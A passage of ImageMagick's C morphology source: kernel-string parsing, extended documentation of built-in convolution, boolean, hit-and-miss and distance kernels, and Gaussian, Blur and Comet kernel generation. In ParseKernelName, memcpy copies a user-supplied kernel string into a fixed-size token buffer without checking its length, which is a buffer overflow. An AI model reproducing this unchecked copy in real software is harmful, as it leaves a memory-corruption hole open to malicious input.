GetNextToken(p,&p,MagickPathExtent,token);
if (*token == ',')
GetNextToken(p,&p,MagickPathExtent,token);
if ( LocaleCompare("nan",token) == 0
|| LocaleCompare("-",token) == 0 ) {
kernel->values[i] = nan; /* this value is not part of neighbourhood */
}
else {
kernel->values[i] = StringToDouble(token,(char **) NULL);
( kernel->values[i] < 0)
? ( kernel->negative_range += kernel->values[i] )
: ( kernel->positive_range += kernel->values[i] );
Minimize(kernel->minimum, kernel->values[i]);
Maximize(kernel->maximum, kernel->values[i]);
}
}
/* sanity check -- no more values in kernel definition */
GetNextToken(p,&p,MagickPathExtent,token);
if ( *token != '\0' && *token != ';' && *token != '\'' )
return(DestroyKernelInfo(kernel));
#if 0
/* this was the old method of handling an incomplete kernel */
if ( i < (ssize_t) (kernel->width*kernel->height) ) {
Minimize(kernel->minimum, kernel->values[i]);
Maximize(kernel->maximum, kernel->values[i]);
for ( ; i < (ssize_t) (kernel->width*kernel->height); i++)
kernel->values[i]=0.0;
}
#else
/* Number of values for kernel was not enough - Report Error */
if ( i < (ssize_t) (kernel->width*kernel->height) )
return(DestroyKernelInfo(kernel));
#endif
/* check that we received at least one real (non-nan) value! */
if (kernel->minimum == MagickMaximumValue)
return(DestroyKernelInfo(kernel));
if ( (flags & AreaValue) != 0 ) /* '@' symbol in kernel size */
ExpandRotateKernelInfo(kernel, 45.0); /* cyclic rotate 3x3 kernels */
else if ( (flags & GreaterValue) != 0 ) /* '>' symbol in kernel args */
ExpandRotateKernelInfo(kernel, 90.0); /* 90 degree rotate of kernel */
else if ( (flags & LessValue) != 0 ) /* '<' symbol in kernel args */
ExpandMirrorKernelInfo(kernel); /* 90 degree mirror rotate */
return(kernel);
}
static KernelInfo *ParseKernelName(const char *kernel_string,
ExceptionInfo *exception)
{
char
token[MagickPathExtent];
const char
*p,
*end;
GeometryInfo
args;
KernelInfo
*kernel;
MagickStatusType
flags;
ssize_t
type;
/* Parse special 'named' kernel */
GetNextToken(kernel_string,&p,MagickPathExtent,token);
type=ParseCommandOption(MagickKernelOptions,MagickFalse,token);
if ( type < 0 || type == UserDefinedKernel )
return((KernelInfo *) NULL); /* not a valid named kernel */
while (((isspace((int) ((unsigned char) *p)) != 0) ||
(*p == ',') || (*p == ':' )) && (*p != '\0') && (*p != ';'))
p++;
end = strchr(p, ';'); /* end of this kernel definition */
if ( end == (char *) NULL )
end = strchr(p, '\0');
/* ParseGeometry() needs the geometry separated! -- Arrgghh */
memcpy(token, p, (size_t) (end-p));
token[end-p] = '\0';
SetGeometryInfo(&args);
flags = ParseGeometry(token, &args);
#if 0
/* For Debugging Geometry Input */
(void) FormatLocaleFile(stderr, "Geometry = 0x%04X : %lg x %lg %+lg %+lg\n",
flags, args.rho, args.sigma, args.xi, args.psi );
#endif
/* special handling of missing values in input string */
switch( type ) {
/* Shape Kernel Defaults */
case UnityKernel:
if ( (flags & WidthValue) == 0 )
args.rho = 1.0; /* Default scale = 1.0, zero is valid */
break;
case SquareKernel:
case DiamondKernel:
case OctagonKernel:
case DiskKernel:
case PlusKernel:
case CrossKernel:
if ( (flags & HeightValue) == 0 )
args.sigma = 1.0; /* Default scale = 1.0, zero is valid */
break;
case RingKernel:
if ( (flags & XValue) == 0 )
args.xi = 1.0; /* Default scale = 1.0, zero is valid */
break;
case RectangleKernel: /* Rectangle - set size defaults */
if ( (flags & WidthValue) == 0 ) /* if no width then */
args.rho = args.sigma; /* then width = height */
if ( args.rho < 1.0 ) /* if width too small */
args.rho = 3; /* then width = 3 */
if ( args.sigma < 1.0 ) /* if height too small */
args.sigma = args.rho; /* then height = width */
if ( (flags & XValue) == 0 ) /* center offset if not defined */
args.xi = (double)(((ssize_t)args.rho-1)/2);
if ( (flags & YValue) == 0 )
args.psi = (double)(((ssize_t)args.sigma-1)/2);
break;
/* Distance Kernel Defaults */
case ChebyshevKernel:
case ManhattanKernel:
case OctagonalKernel:
case EuclideanKernel:
if ( (flags & HeightValue) == 0 ) /* no distance scale */
args.sigma = 100.0; /* default distance scaling */
else if ( (flags & AspectValue ) != 0 ) /* '!' flag */
args.sigma = QuantumRange/(args.sigma+1); /* maximum pixel distance */
else if ( (flags & PercentValue ) != 0 ) /* '%' flag */
args.sigma *= QuantumRange/100.0; /* percentage of color range */
break;
default:
break;
}
kernel = AcquireKernelBuiltIn((KernelInfoType)type, &args, exception);
if ( kernel == (KernelInfo *) NULL )
return(kernel);
/* global expand to rotated kernel list - only for single kernels */
if ( kernel->next == (KernelInfo *) NULL ) {
if ( (flags & AreaValue) != 0 ) /* '@' symbol in kernel args */
ExpandRotateKernelInfo(kernel, 45.0);
else if ( (flags & GreaterValue) != 0 ) /* '>' symbol in kernel args */
ExpandRotateKernelInfo(kernel, 90.0);
else if ( (flags & LessValue) != 0 ) /* '<' symbol in kernel args */
ExpandMirrorKernelInfo(kernel);
}
return(kernel);
}
MagickExport KernelInfo *AcquireKernelInfo(const char *kernel_string,
ExceptionInfo *exception)
{
KernelInfo
*kernel,
*new_kernel;
char
*kernel_cache,
token[MagickPathExtent];
const char
*p;
if (kernel_string == (const char *) NULL)
return(ParseKernelArray(kernel_string));
p=kernel_string;
kernel_cache=(char *) NULL;
if (*kernel_string == '@')
{
kernel_cache=FileToString(kernel_string+1,~0UL,exception);
if (kernel_cache == (char *) NULL)
return((KernelInfo *) NULL);
p=(const char *) kernel_cache;
}
kernel=NULL;
while (GetNextToken(p,(const char **) NULL,MagickPathExtent,token), *token != '\0')
{
/* ignore extra or multiple ';' kernel separators */
if (*token != ';')
{
/* tokens starting with alpha is a Named kernel */
if (isalpha((int) ((unsigned char) *token)) != 0)
new_kernel=ParseKernelName(p,exception);
else /* otherwise a user defined kernel array */
new_kernel=ParseKernelArray(p);
/* Error handling -- this is not proper error handling! */
if (new_kernel == (KernelInfo *) NULL)
{
if (kernel != (KernelInfo *) NULL)
kernel=DestroyKernelInfo(kernel);
return((KernelInfo *) NULL);
}
/* initialise or append the kernel list */
if (kernel == (KernelInfo *) NULL)
kernel=new_kernel;
else
LastKernelInfo(kernel)->next=new_kernel;
}
/* look for the next kernel in list */
p=strchr(p,';');
if (p == (char *) NULL)
break;
p++;
}
if (kernel_cache != (char *) NULL)
kernel_cache=DestroyString(kernel_cache);
return(kernel);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% A c q u i r e K e r n e l B u i l t I n %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% AcquireKernelBuiltIn() returns one of the 'named' built-in types of
% kernels used for special purposes such as gaussian blurring, skeleton
% pruning, and edge distance determination.
%
% They take a KernelType, and a set of geometry style arguments, which were
% typically decoded from a user supplied string, or from a more complex
% Morphology Method that was requested.
%
% The format of the AcquireKernelBuiltIn method is:
%
% KernelInfo *AcquireKernelBuiltIn(const KernelInfoType type,
% const GeometryInfo args)
%
% A description of each parameter follows:
%
% o type: the pre-defined type of kernel wanted
%
% o args: arguments defining or modifying the kernel
%
% Convolution Kernels
%
% Unity
% A No-Op or Scaling single-element kernel.
%
% Gaussian:{radius},{sigma}
% Generate a two-dimensional gaussian kernel, as used by -gaussian.
% The sigma for the curve is required. The resulting kernel is
% normalized.
%
% If 'sigma' is zero, you get a single pixel on a field of zeros.
%
% NOTE that the 'radius' is optional, but if provided can limit (clip)
% the final size of the resulting kernel to a square 2*radius+1 in size.
% The radius should be at least 2 times that of the sigma value, or
% severe clipping and aliasing may result. If not given or set to 0 the
% radius will be determined so as to produce the best minimal error
% result, which is usually much larger than is normally needed.
%
% LoG:{radius},{sigma}
% "Laplacian of a Gaussian" or "Mexician Hat" Kernel.
% The supposed ideal edge detection, zero-summing kernel.
%
% An alternative to this kernel is to use a "DoG" with a sigma ratio of
% approx 1.6 (according to wikipedia).
%
% DoG:{radius},{sigma1},{sigma2}
% "Difference of Gaussians" Kernel.
% As "Gaussian" but with a gaussian produced by 'sigma2' subtracted
% from the gaussian produced by 'sigma1'. Typically sigma2 > sigma1.
% The result is a zero-summing kernel.
%
% Blur:{radius},{sigma}[,{angle}]
% Generates a 1 dimensional or linear gaussian blur, at the angle given
% (currently restricted to orthogonal angles). If a 'radius' is given the
% kernel is clipped to a width of 2*radius+1. Kernel can be rotated
% by a 90 degree angle.
%
% If 'sigma' is zero, you get a single pixel on a field of zeros.
%
% Note that two convolutions with two "Blur" kernels perpendicular to
% each other, is equivalent to a far larger "Gaussian" kernel with the
% same sigma value. However, it is much faster to apply. This is how the
% "-blur" operator actually works.
%
% Comet:{width},{sigma},{angle}
% Blur in one direction only, much like how a bright object leaves
% a comet-like trail. The Kernel is actually half a gaussian curve.
% Adding two such blurs in opposite directions produces a Blur Kernel.
% Angle can be rotated in multiples of 90 degrees.
%
% Note that the first argument is the width of the kernel and not the
% radius of the kernel.
%
% Binomial:[{radius}]
% Generate a discrete kernel using a 2-dimensional Pascal's Triangle
% of values. Used for special forms of image filters.
%
% # Still to be implemented...
% #
% # Filter2D
% # Filter1D
% # Set kernel values using a resize filter, and given scale (sigma)
% # Cylindrical or Linear. Is this possible with an image?
% #
%
% Named Constant Convolution Kernels
%
% All these are unscaled, zero-summing kernels by default. As such for
% non-HDRI versions of ImageMagick some form of normalization, user scaling,
% and biasing the results is recommended, to prevent the resulting image
% being 'clipped'.
%
% The 3x3 kernels (most of these) can be circularly rotated in multiples of
% 45 degrees to generate the 8 angled variants of each of the kernels.
%
% Laplacian:{type}
% Discrete Laplacian Kernels (without normalization)
% Type 0 : 3x3 with center:8 surrounded by -1 (8 neighbourhood)
% Type 1 : 3x3 with center:4 edge:-1 corner:0 (4 neighbourhood)
% Type 2 : 3x3 with center:4 edge:1 corner:-2
% Type 3 : 3x3 with center:4 edge:-2 corner:1
% Type 5 : 5x5 laplacian
% Type 7 : 7x7 laplacian
% Type 15 : 5x5 LoG (sigma approx 1.4)
% Type 19 : 9x9 LoG (sigma approx 1.4)
%
% Sobel:{angle}
% Sobel 'Edge' convolution kernel (3x3)
% | -1, 0, 1 |
% | -2, 0, 2 |
% | -1, 0, 1 |
%
% Roberts:{angle}
% Roberts convolution kernel (3x3)
% | 0, 0, 0 |
% | -1, 1, 0 |
% | 0, 0, 0 |
%
% Prewitt:{angle}
% Prewitt Edge convolution kernel (3x3)
% | -1, 0, 1 |
% | -1, 0, 1 |
% | -1, 0, 1 |
%
% Compass:{angle}
% Prewitt's "Compass" convolution kernel (3x3)
% | -1, 1, 1 |
% | -1,-2, 1 |
% | -1, 1, 1 |
%
% Kirsch:{angle}
% Kirsch's "Compass" convolution kernel (3x3)
% | -3,-3, 5 |
% | -3, 0, 5 |
% | -3,-3, 5 |
%
% FreiChen:{angle}
% Frei-Chen Edge Detector is based on a kernel that is similar to
% the Sobel Kernel, but is designed to be isotropic. That is it takes
% into account the distance of the diagonal in the kernel.
%
% | 1, 0, -1 |
% | sqrt(2), 0, -sqrt(2) |
% | 1, 0, -1 |
%
% FreiChen:{type},{angle}
%
% Frei-Chen Pre-weighted kernels...
%
% Type 0: default un-normalized version shown above.
%
% Type 1: Orthogonal Kernel (same as type 11 below)
% | 1, 0, -1 |
% | sqrt(2), 0, -sqrt(2) | / 2*sqrt(2)
% | 1, 0, -1 |
%
% Type 2: Diagonal form of Kernel...
% | 1, sqrt(2), 0 |
% | sqrt(2), 0, -sqrt(2) | / 2*sqrt(2)
% | 0, -sqrt(2), -1 |
%
% However this kernel is also at the heart of the FreiChen Edge Detection
% Process, which uses a set of 9 specially weighted kernels. These 9
% kernels are not normalized, but directly applied to the image. The
% results are then added together, to produce the intensity of an edge in
% a specific direction. The square root of the pixel value can then be
% taken as the cosine of the edge, and with at least 2 such runs at 90
% degrees from each other, both the direction and the strength of the
% edge can be determined.
%
% Type 10: All 9 of the following pre-weighted kernels...
%
% Type 11: | 1, 0, -1 |
% | sqrt(2), 0, -sqrt(2) | / 2*sqrt(2)
% | 1, 0, -1 |
%
% Type 12: | 1, sqrt(2), 1 |
% | 0, 0, 0 | / 2*sqrt(2)
% | 1, sqrt(2), 1 |
%
% Type 13: | sqrt(2), -1, 0 |
% | -1, 0, 1 | / 2*sqrt(2)
% | 0, 1, -sqrt(2) |
%
% Type 14: | 0, 1, -sqrt(2) |
% | -1, 0, 1 | / 2*sqrt(2)
% | sqrt(2), -1, 0 |
%
% Type 15: | 0, -1, 0 |
% | 1, 0, 1 | / 2
% | 0, -1, 0 |
%
% Type 16: | 1, 0, -1 |
% | 0, 0, 0 | / 2
% | -1, 0, 1 |
%
% Type 17: | 1, -2, 1 |
% | -2, 4, -2 | / 6
% | 1, -2, 1 |
%
% Type 18: | -2, 1, -2 |
% | 1, 4, 1 | / 6
% | -2, 1, -2 |
%
% Type 19: | 1, 1, 1 |
% | 1, 1, 1 | / 3
% | 1, 1, 1 |
%
% The first 4 are for edge detection, the next 4 are for line detection
% and the last is to add an average component to the results.
%
% Using a special type of '-1' will return all 9 pre-weighted kernels
% as a multi-kernel list, so that you can use them directly (without
% normalization) with the special "-set option:morphology:compose Plus"
% setting to apply the full FreiChen Edge Detection Technique.
%
% If 'type' is large it will be taken to be an actual rotation angle for
% the default FreiChen (type 0) kernel. As such FreiChen:45 will look
% like a Sobel:45 but with 'sqrt(2)' instead of '2' values.
%
% WARNING: The above was laid out as per
% http://www.math.tau.ac.il/~turkel/notes/edge_detectors.pdf
% but rotated 90 degrees so direction is from the left rather than the top.
% I have yet to find any secondary confirmation of the above. The only
% other source found was actual source code at
% http://ltswww.epfl.ch/~courstiv/exos_labos/sol3.pdf
% Neither paper defines the kernels in a way that looks logical or
% correct when taken as a whole.
%
% Boolean Kernels
%
% Diamond:[{radius}[,{scale}]]
% Generate a diamond shaped kernel with given radius to the points.
% Kernel size will again be radius*2+1 square and defaults to radius 1,
% generating a 3x3 kernel that is slightly smaller than a square.
%
% Square:[{radius}[,{scale}]]
% Generate a square shaped kernel of size radius*2+1, and defaulting
% to a 3x3 (radius 1).
%
% Octagon:[{radius}[,{scale}]]
% Generate an octagonal shaped kernel of given radius and constant scale.
% Default radius is 3 producing a 7x7 kernel. A radius of 1 will result
% in a "Diamond" kernel.
%
% Disk:[{radius}[,{scale}]]
% Generate a binary disk, thresholded at the radius given; the radius
% may be a floating-point value. Final Kernel size is floor(radius)*2+1
% square. A radius of 5.3 is the default.
%
% NOTE: Low-radius Disk kernels produce the same results as
% many of the previously defined kernels, but differ greatly at larger
% radii. Here is a table of equivalences...
% "Disk:1" => "Diamond", "Octagon:1", or "Cross:1"
% "Disk:1.5" => "Square"
% "Disk:2" => "Diamond:2"
% "Disk:2.5" => "Octagon"
% "Disk:2.9" => "Square:2"
% "Disk:3.5" => "Octagon:3"
% "Disk:4.5" => "Octagon:4"
% "Disk:5.4" => "Octagon:5"
% "Disk:6.4" => "Octagon:6"
% All other Disk shapes are unique to this kernel, but because a "Disk"
% is more circular when using a larger radius, using a larger radius is
% preferred over iterating the morphological operation.
%
% Rectangle:{geometry}
% Simply generate a rectangle of 1's with the size given. You can also
% specify the location of the 'control point', otherwise the closest
% pixel to the center of the rectangle is selected.
%
% Properly centered and odd sized rectangles work the best.
%
% Symbol Dilation Kernels
%
% These kernels are not good general morphological kernels, but are used
% more for highlighting and marking any single pixels in an image using
% a "Dilate" method as appropriate.
%
% For the same reasons, iterating these kernels does not produce the
% same result as using a larger radius for the symbol.
%
% Plus:[{radius}[,{scale}]]
% Cross:[{radius}[,{scale}]]
% Generate a kernel in the shape of a 'plus' or a 'cross' with
% each arm the length of the given radius (default 2).
%
% NOTE: "plus:1" is equivalent to a "Diamond" kernel.
%
% Ring:{radius1},{radius2}[,{scale}]
% A ring of the values given that falls between the two radii.
% Defaults to a ring of approximately radius 3 in a 7x7 kernel.
% This is the 'edge' pixels of the default "Disk" kernel,
% More specifically, "Ring" -> "Ring:2.5,3.5,1.0"
%
% Hit and Miss Kernels
%
% Peak:radius1,radius2
% Find any peak larger than the pixels that fall between the two radii.
% The default ring of pixels is as per "Ring".
% Edges
% Find flat orthogonal edges of a binary shape
% Corners
% Find 90 degree corners of a binary shape
% Diagonals:type
% A special kernel to thin the 'outside' of diagonals
% LineEnds:type
% Find end points of lines (for pruning a skeleton)
% Two types of line ends (defaults to both) can be searched for
% Type 0: All line ends
% Type 1: single kernel for 4-connected line ends
% Type 2: single kernel for simple line ends
% LineJunctions
% Find three line junctions (within a skeleton)
% Type 0: all line junctions
% Type 1: Y Junction kernel
% Type 2: Diagonal T Junction kernel
% Type 3: Orthogonal T Junction kernel
% Type 4: Diagonal X Junction kernel
% Type 5: Orthogonal + Junction kernel
% Ridges:type
% Find single pixel ridges or thin lines
% Type 1: Find single pixel thick lines and ridges
% Type 2: Find two pixel thick lines and ridges
% ConvexHull
% Octagonal Thickening Kernel, to generate convex hulls of 45 degrees
% Skeleton:type
% Traditional skeleton generating kernels.
% Type 1: Traditional Skeleton kernel (4 connected skeleton)
% Type 2: HIPR2 Skeleton kernel (8 connected skeleton)
% Type 3: Thinning skeleton based on a research paper by
% Dan S. Bloomberg (Default Type)
% ThinSE:type
% A huge variety of Thinning Kernels designed to preserve connectivity.
% Many other kernel sets use these kernels as source definitions.
% Type numbers are 41-49, 81-89, 481, and 482 which are based on
% the super and sub notations used in the source research paper.
%
% Distance Measuring Kernels
%
% Different types of distance measuring methods, which are used with the
% 'Distance' morphology method for generating a gradient based on
% distance from an edge of a binary shape, though there is a technique
% for handling an anti-aliased shape.
%
% See the 'Distance' Morphological Method, for information on how it is
% applied.
%
% Chebyshev:[{radius}][x{scale}[%!]]
% Chebyshev Distance (also known as Tchebychev or Chessboard distance)
% is a value of one to any neighbour, orthogonal or diagonal. One way
% of thinking of it is the number of squares a 'King' or 'Queen' in
% chess needs to traverse to reach any other position on a chess board.
% It results in a 'square' like distance function, but one where
% diagonals are given a value that is closer than expected.
%
% Manhattan:[{radius}][x{scale}[%!]]
% Manhattan Distance (also known as Rectilinear, City Block, or the Taxi
% Cab distance metric) is the distance needed when you can only
% travel in horizontal or vertical directions. It is the
% distance a 'Rook' in chess would have to travel, and results in
% diamond-like distances, where diagonals are further than expected.
%
% Octagonal:[{radius}][x{scale}[%!]]
% An interleaving of Manhattan and Chebyshev metrics producing an
% increasing octagonally shaped distance. Distances match those of
% the "Octagon" shaped kernel of the same radius. The minimum radius
% and default is 2, producing a 5x5 kernel.
%
% Euclidean:[{radius}][x{scale}[%!]]
% Euclidean distance is the 'direct' or 'as the crow flies' distance.
% However by default the kernel size only has a radius of 1, which
% limits the distance to 'Knight' like moves, with only orthogonal and
% diagonal measurements being correct. As such for the default kernel
% you will get an octagonal-like distance function.
%
% However using a larger radius such as "Euclidean:4" you will get a
% much smoother distance gradient from the edge of the shape. Especially
% if the image is pre-processed to include any anti-aliasing pixels.
% Of course a larger kernel is slower to use, and not always needed.
%
% The first three Distance Measuring Kernels will only generate distances
% of exact multiples of {scale} in binary images. As such you can use a
% scale of 1 without losing any information. However you also need some
% scaling when handling non-binary anti-aliased shapes.
%
% The "Euclidean" Distance Kernel however does generate a non-integer
% fractional results, and as such scaling is vital even for binary shapes.
%
*/
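/* Illustrative examples (a sketch, not a definitive reference): typical
** built-in kernel strings that reach this function via ParseKernelName():
**   "Gaussian:0x2"      auto-sized 2D gaussian with sigma 2
**   "Octagon:3"         7x7 octagonal boolean kernel
**   "Euclidean:4x1000"  distance kernel of radius 4, scaled by 1000
**   "Sobel:0>"          Sobel kernel expanded into its 90-degree rotations
*/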
MagickExport KernelInfo *AcquireKernelBuiltIn(const KernelInfoType type,
const GeometryInfo *args,ExceptionInfo *exception)
{
KernelInfo
*kernel;
register ssize_t
i;
register ssize_t
u,
v;
double
nan = sqrt((double)-1.0); /* Special Value : Not A Number */
/* Generate a new empty kernel if needed */
kernel=(KernelInfo *) NULL;
switch(type) {
case UndefinedKernel: /* These should not call this function */
case UserDefinedKernel:
assert("Should not call this function" != (char *) NULL);
break;
case LaplacianKernel: /* Named Discrete Convolution Kernels */
case SobelKernel: /* these are defined using other kernels */
case RobertsKernel:
case PrewittKernel:
case CompassKernel:
case KirschKernel:
case FreiChenKernel:
case EdgesKernel: /* Hit and Miss kernels */
case CornersKernel:
case DiagonalsKernel:
case LineEndsKernel:
case LineJunctionsKernel:
case RidgesKernel:
case ConvexHullKernel:
case SkeletonKernel:
case ThinSEKernel:
break; /* A pre-generated kernel is not needed */
#if 0
/* set to 1 to do a compile-time check that we haven't missed anything */
case UnityKernel:
case GaussianKernel:
case DoGKernel:
case LoGKernel:
case BlurKernel:
case CometKernel:
case BinomialKernel:
case DiamondKernel:
case SquareKernel:
case RectangleKernel:
case OctagonKernel:
case DiskKernel:
case PlusKernel:
case CrossKernel:
case RingKernel:
case PeaksKernel:
case ChebyshevKernel:
case ManhattanKernel:
case OctangonalKernel:
case EuclideanKernel:
#else
default:
#endif
/* Generate the base Kernel Structure */
kernel=(KernelInfo *) AcquireMagickMemory(sizeof(*kernel));
if (kernel == (KernelInfo *) NULL)
return(kernel);
(void) ResetMagickMemory(kernel,0,sizeof(*kernel));
kernel->minimum = kernel->maximum = kernel->angle = 0.0;
kernel->negative_range = kernel->positive_range = 0.0;
kernel->type = type;
kernel->next = (KernelInfo *) NULL;
kernel->signature=MagickCoreSignature;
break;
}
switch(type) {
/*
Convolution Kernels
*/
case UnityKernel:
{
kernel->height = kernel->width = (size_t) 1;
kernel->x = kernel->y = (ssize_t) 0;
kernel->values=(MagickRealType *) MagickAssumeAligned(
AcquireAlignedMemory(1,sizeof(*kernel->values)));
if (kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(kernel));
kernel->maximum = kernel->values[0] = args->rho;
break;
}
case GaussianKernel:
case DoGKernel:
case LoGKernel:
{ double
sigma = fabs(args->sigma),
sigma2 = fabs(args->xi),
A, B, R;
if ( args->rho >= 1.0 )
kernel->width = (size_t)args->rho*2+1;
else if ( (type != DoGKernel) || (sigma >= sigma2) )
kernel->width = GetOptimalKernelWidth2D(args->rho,sigma);
else
kernel->width = GetOptimalKernelWidth2D(args->rho,sigma2);
kernel->height = kernel->width;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(MagickRealType *) MagickAssumeAligned(
AcquireAlignedMemory(kernel->width,kernel->height*
sizeof(*kernel->values)));
if (kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(kernel));
/* WARNING: The following generates a 'sampled gaussian' kernel.
* What we really want is a 'discrete gaussian' kernel.
*
* How to do this I don't know, but it appears to be based on the
* Error Function 'erf()' (integral of a gaussian)
*/
if ( type == GaussianKernel || type == DoGKernel )
{ /* Calculate a Gaussian, OR positive half of a DoG */
if ( sigma > MagickEpsilon )
{ A = 1.0/(2.0*sigma*sigma); /* simplify loop expressions */
B = (double) (1.0/(Magick2PI*sigma*sigma));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
kernel->values[i] = exp(-((double)(u*u+v*v))*A)*B;
}
else /* limiting case - a unity (normalized Dirac) kernel */
{ (void) ResetMagickMemory(kernel->values,0, (size_t)
kernel->width*kernel->height*sizeof(*kernel->values));
kernel->values[kernel->x+kernel->y*kernel->width] = 1.0;
}
}
if ( type == DoGKernel )
{ /* Subtract a Negative Gaussian for "Difference of Gaussian" */
if ( sigma2 > MagickEpsilon )
{ sigma = sigma2; /* simplify loop expressions */
A = 1.0/(2.0*sigma*sigma);
B = (double) (1.0/(Magick2PI*sigma*sigma));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
kernel->values[i] -= exp(-((double)(u*u+v*v))*A)*B;
}
else /* limiting case - a unity (normalized Dirac) kernel */
kernel->values[kernel->x+kernel->y*kernel->width] -= 1.0;
}
if ( type == LoGKernel )
{ /* Calculate a Laplacian of a Gaussian - Or Mexician Hat */
if ( sigma > MagickEpsilon )
{ A = 1.0/(2.0*sigma*sigma); /* simplify loop expressions */
B = (double) (1.0/(MagickPI*sigma*sigma*sigma*sigma));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
{ R = ((double)(u*u+v*v))*A;
kernel->values[i] = (1-R)*exp(-R)*B;
}
}
else /* special case - generate a unity kernel */
{ (void) ResetMagickMemory(kernel->values,0, (size_t)
kernel->width*kernel->height*sizeof(*kernel->values));
kernel->values[kernel->x+kernel->y*kernel->width] = 1.0;
}
}
/* Note the above kernels may have been 'clipped' by a user defined
** radius, producing a smaller (darker) kernel. Also for very small
** sigmas (< 0.1) the central value becomes larger than one, thus
** producing a very bright kernel.
**
** Normalization will still be needed.
*/
/* Normalize the 2D Gaussian Kernel
**
** NB: a CorrelateNormalize performs a normal Normalize if
** there are no negative values.
*/
CalcKernelMetaData(kernel); /* the other kernel meta-data */
ScaleKernelInfo(kernel, 1.0, CorrelateNormalizeValue);
break;
}
case BlurKernel:
{ double
sigma = fabs(args->sigma),
alpha, beta;
if ( args->rho >= 1.0 )
kernel->width = (size_t)args->rho*2+1;
else
kernel->width = GetOptimalKernelWidth1D(args->rho,sigma);
kernel->height = 1;
kernel->x = (ssize_t) (kernel->width-1)/2;
kernel->y = 0;
kernel->negative_range = kernel->positive_range = 0.0;
kernel->values=(MagickRealType *) MagickAssumeAligned(
AcquireAlignedMemory(kernel->width,kernel->height*
sizeof(*kernel->values)));
if (kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(kernel));
#if 1
#define KernelRank 3
/* Formula derived from GetBlurKernel() in "effect.c" (plus bug fix).
** It generates a gaussian 3 times the width, and compresses it into
** the expected range. This produces a closer normalization of the
** resulting kernel, especially for very low sigma values.
** As such, while weird, it is preferred.
**
** I am told this method originally came from Photoshop.
**
** A properly normalized curve is generated (apart from edge clipping)
** even though we later normalize the result (for edge clipping)
** to allow the correct generation of a "Difference of Blurs".
*/
/* initialize */
v = (ssize_t) (kernel->width*KernelRank-1)/2; /* start/end points to fit range */
(void) ResetMagickMemory(kernel->values,0, (size_t)
kernel->width*kernel->height*sizeof(*kernel->values));
/* Calculate a Positive 1D Gaussian */
if ( sigma > MagickEpsilon )
{ sigma *= KernelRank; /* simplify loop expressions */
alpha = 1.0/(2.0*sigma*sigma);
beta= (double) (1.0/(MagickSQ2PI*sigma ));
for ( u=-v; u <= v; u++) {
kernel->values[(u+v)/KernelRank] +=
exp(-((double)(u*u))*alpha)*beta;
}
}
else /* special case - generate a unity kernel */
kernel->values[kernel->x+kernel->y*kernel->width] = 1.0;
#else
/* Direct calculation without curve averaging
This is equivalent to a KernelRank of 1 */
/* Calculate a Positive Gaussian */
if ( sigma > MagickEpsilon )
{ alpha = 1.0/(2.0*sigma*sigma); /* simplify loop expressions */
beta = 1.0/(MagickSQ2PI*sigma);
for ( i=0, u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
kernel->values[i] = exp(-((double)(u*u))*alpha)*beta;
}
else /* special case - generate a unity kernel */
{ (void) ResetMagickMemory(kernel->values,0, (size_t)
kernel->width*kernel->height*sizeof(*kernel->values));
kernel->values[kernel->x+kernel->y*kernel->width] = 1.0;
}
#endif
/* Note the above kernel may have been 'clipped' by a user defined
** radius, producing a smaller (darker) kernel. Also for very small
** sigmas (< 0.1) the central value becomes larger than one, as a
** result of not generating an actual 'discrete' kernel, thus
** producing a very bright 'impulse'.
**
** Because of these two factors Normalization is required!
*/
/* Normalize the 1D Gaussian Kernel
**
** NB: a CorrelateNormalize performs a normal Normalize if
** there are no negative values.
*/
CalcKernelMetaData(kernel); /* the other kernel meta-data */
ScaleKernelInfo(kernel, 1.0, CorrelateNormalizeValue);
/* rotate the 1D kernel by given angle */
RotateKernelInfo(kernel, args->xi );
break;
}
case CometKernel:
{ double
sigma = fabs(args->sigma),
A;
if ( args->rho < 1.0 )
kernel->width = (GetOptimalKernelWidth1D(args->rho,sigma)-1)/2+1;
else
kernel->width = (size_t)args->rho;
kernel->x = kernel->y = 0;
kernel->height = 1;
kernel->negative_range = kernel->positive_range = 0.0;
kernel->values=(MagickRealType *) MagickAssumeAligned(
AcquireAlignedMemory(kernel->width,kernel->height*
sizeof(*kernel->values)));
if (kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(kernel));
/* A comet blur is half a 1D gaussian curve, so that the object is
** blurred in one direction only. This may not be quite the right
** curve to use so may change in the future. The function must be
** normalised after generation, which also resolves any clipping.
**
** As we are normalizing and not subtracting gaussians,
** there is no need for a divisor in the gaussian formula.
**
** It is also less complex.
*/
if ( sigma > MagickEpsilon )
{
#if 1
#define KernelRank 3
v = (ssize_t) kernel->width*KernelRank; /* start/end points */
(void) ResetMagickMemory(kernel->values,0, (size_t)
kernel->width*sizeof(*kernel->values));
sigma *= KernelRank; /* simplify the loop expression */
A = 1.0/(2.0*sigma*sigma);
/* B = 1.0/(MagickSQ2PI*sigma); */
for ( u=0; u < v; u++) {
kernel->values[u/KernelRank] +=
exp(-((double)(u*u))*A);
/* exp(-((double)(i*i))/2.0*sigma*sigma)/(MagickSQ2PI*sigma); */
}
for (i=0; i < (ssize_t) kernel->width; i++)
kernel->positive_range += kernel->values[i];
#else
A = 1.0/(2.0*sigma*sigma); /* simplify the loop expression */
/* B = 1.0/(MagickSQ2PI*sigma); */
for ( i=0; i < (ssize_t) kernel->width; i++)
kernel->positive_range +=
kernel->values[i] = exp(-((double)(i*i))*A);
/* exp(-((double)(i*i))/2.0*sigma*sigma)/(MagickSQ2PI*sigma); */
#endif
}
